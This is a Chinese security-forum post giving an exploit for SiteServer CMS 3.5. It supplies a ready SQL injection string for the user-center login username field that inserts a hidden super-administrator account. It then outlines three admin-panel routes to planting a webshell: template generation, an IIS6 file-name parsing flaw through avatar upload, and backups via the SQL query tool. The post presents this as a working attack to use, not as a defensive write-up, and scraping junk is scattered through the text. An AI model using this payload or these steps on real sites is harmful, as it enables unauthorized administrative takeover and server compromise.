找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2865|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
: R; j; Y; m' w3 Rstieserver官网:www.siteserver.cn3 h0 G4 A* u& J
EXP:
7 p: V6 [' ^9 O" V8 B直接访问UserCenter/login.aspx
9 |3 N3 [# K2 c0 b! e用户名处输入:. D5 e) a% z8 W

7 J# C: Q2 ~) q4 E% a0 N% z( ^3 f123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–% y: a$ h/ k- \5 ~9 h* D' s
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。2 V3 I2 x" l& {- V* x, Y
之后再访问后台SiteServer/login.aspx用插入的用户登陆
1 {8 ?! P& ^& f$ t( p后台拿webshell的三种方法:
; J+ A3 D, W- O* q5 A一、
/ W& T+ j4 O3 q! m7 R" S# }$ f5 \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx$ @4 M" V4 |5 D0 @
二、
1 A$ e. c, a# q成员权限-》添加用户-》用户名为:1.asp
+ v8 g& V9 t) x& F3 K( Chttp://127.0.0.1/usercenter/
; v) h0 f2 r6 i/ P. r: O用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell$ `3 [# x, Z7 E& S/ a
(ps:后台添加用户时不会验证是否含有非法字符)
2 @; Y; o' S* X6 A/ U三、
9 s+ u0 d; `5 a& F2 x* o$ I2 D系统工具-》实用工具-》机器参数查看9 `4 C9 }; B) F& H9 v, w
可以看到数据库类型、名称,WEB路径4 x0 k. ^% L$ E3 C
系统工具-》数据库工具-》SQL语句查询# e: j7 H, S% c3 y- |7 B6 ~" ^9 Y
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表